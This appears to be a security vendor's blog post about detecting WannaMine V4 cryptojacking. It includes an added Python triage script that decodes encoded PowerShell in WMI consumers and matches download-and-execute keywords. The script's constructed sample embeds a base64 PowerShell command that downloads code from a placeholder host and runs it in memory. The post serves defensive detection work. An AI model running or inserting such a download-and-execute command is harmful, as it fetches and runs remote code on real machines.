
Minerva Labs Blog


Preventing WannaMine4 Cryptojacking Attacks

Cryptojacking is a type of malware attack in which threat actors use hijacked devices to illegally mine cryptocurrency. It is widely considered to be among the least invasive cyber security threats, because the goal of a cryptojacker is to remain hidden on the system for as long as possible, thus maximizing the value extracted from the target.

This belief is not only false but dangerous. Cryptojacking malware usually arrives through unpatched servers or weak Remote Desktop Protocol (RDP) credentials, which can be exploited by much-dreaded ransomware groups just as easily as by cryptocurrency criminals.

WannaMine V4, an active cryptojacker, was recently detected and stopped by Minerva Labs. In the attack we detected, threat actors used WMI persistence to execute malicious PowerShell scripts that download code and execute it in-memory. In-memory techniques are frequently used by attackers to bypass traditional anti-virus products.
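A defender-side triage sketch for the WMI-launched, encoded PowerShell described above. This is an added example, not Minerva's code or tooling: it assumes WMI `CommandLineEventConsumer` records have already been exported as dictionaries, and the token list, the `review_consumer` helper and the sample records are constructed for illustration.

```python
import base64
import re

# PowerShell accepts abbreviations of -EncodedCommand (-e, -enc, ...), so match broadly.
ENC_FLAG = re.compile(r"\s-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.I)
# Heuristic tokens for download-and-run-in-memory scripts (an assumption, not from the post).
DOWNLOAD_EXEC = re.compile(
    r"\b(iex|invoke-expression|downloadstring|downloaddata|net\.webclient|frombase64string)\b",
    re.I)

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except ValueError:  # covers malformed base64 and malformed UTF-16
        return None

def review_consumer(consumer):
    """Return sorted findings for one exported CommandLineEventConsumer record."""
    cmd = consumer.get("CommandLineTemplate") or ""
    findings = set()
    if re.search(r"\bpowershell(\.exe)?\b", cmd, re.I):
        findings.add("powershell-in-wmi-consumer")
    text = cmd
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        findings.add("encoded-command")
        text += "\n" + decoded  # scan the hidden script as well as the visible command line
    for m in DOWNLOAD_EXEC.finditer(text):
        findings.add("token:" + m.group(1).lower())
    return sorted(findings)

def _encode(script):
    """Build a constructed sample the way -EncodedCommand expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode()

# Constructed records; host.example is a reserved placeholder, not an indicator.
SAMPLE_CONSUMERS = [
    {"Name": "BackupJob",
     "CommandLineTemplate": r"C:\Windows\System32\cmd.exe /c C:\Scripts\backup.cmd"},
    {"Name": "ConstructedSuspicious",
     "CommandLineTemplate": "powershell.exe -NoP -NonI -W Hidden -E " + _encode(
         "IEX (New-Object Net.WebClient).DownloadString('http://host.example/a')")},
]

if __name__ == "__main__":
    for c in SAMPLE_CONSUMERS:
        print(c["Name"], review_consumer(c))
```

Any consumer that returns findings deserves a look at its bound `__EventFilter` as well, since the filter shows when the command fires.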

The decoded PowerShell script:

The events of the Crypto malware as depicted by Minerva’s platform:

IOCs:

Domain names & IPs:


If you think your organization may have been the victim of a cryptojacking attack, or want to learn more about Minerva Labs' anti-ransomware protection solutions, contact us.
